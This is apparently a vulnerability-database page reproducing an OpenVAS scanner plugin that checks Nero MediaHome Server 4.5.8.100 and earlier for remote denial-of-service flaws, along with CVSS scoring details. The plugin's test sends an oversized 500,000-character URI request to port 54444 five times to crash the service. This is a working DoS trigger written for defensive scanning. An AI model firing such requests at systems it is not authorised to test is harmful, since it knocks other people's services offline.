Lucene search

K
openvasCopyright (C) 2013 Greenbone AGOPENVAS:1361412562310803150
HistoryJan 10, 2013 - 12:00 a.m.

Nero MediaHome Server Multiple Remote DoS Vulnerabilities

2013-01-1000:00:00
Copyright (C) 2013 Greenbone AG
plugins.openvas.org
11

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.063 Low

EPSS

Percentile

93.5%

Nero MediaHome Server is prone to multiple denial of service
vulnerabilities.

# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803150");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2012-5876", "CVE-2012-5877");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2013-01-10 14:19:03 +0530 (Thu, 10 Jan 2013)");
  script_name("Nero MediaHome Server Multiple Remote DoS Vulnerabilities");

  script_tag(name:"summary", value:"Nero MediaHome Server is prone to multiple denial of service
  vulnerabilities.");

  script_tag(name:"vuldetect", value:"This test works by sending a big size request to the target
  service listening on port 54444/TCP and checking that  the target service is dead.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since
  the disclosure of this vulnerability. Likely none will be provided anymore. General solution options
  are to upgrade to a newer release, disable respective features, remove the product or replace the
  product by another one.");

  script_tag(name:"affected", value:"Nero MediaHome Server version 4.5.8.100 and prior.");

  script_tag(name:"insight", value:"Multiple flaws are due to improper handling of the URI length,
  HTTP OPTIONS method length, HTTP HEAD request, HTTP REFERER and HTTP HOST header
  within the 'NMMediaServer.dll' in dynamic-link library which allows attackers to
  cause denial of service condition by sending a specially crafted packet
  to port 54444/TCP.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to cause the
  application to crash, creating a denial-of-service condition.");

  script_tag(name:"solution_type", value:"WillNotFix");

  script_xref(name:"URL", value:"http://inter5.org/archives/226548");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Jan/36");
  script_xref(name:"URL", value:"https://www.htbridge.com/advisory/HTB23130");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/525249/30/0/threaded");

  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("gb_get_http_banner.nasl");
  script_require_ports("Services/www", 54444);
  script_mandatory_keys("Nero-MediaHome/banner");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default:54444);

banner = http_get_remote_headers(port:port);
if(!banner || "Nero-MediaHome/" >!< banner)
  exit(0);

if(http_is_dead(port:port))
  exit(0);

req = http_get(item:string("/A", crap(500000)), port:port);

for(i = 0; i < 5; i++)
  http_send_recv(port:port, data:req);

sleep(2);

if(http_is_dead(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.063 Low

EPSS

Percentile

93.5%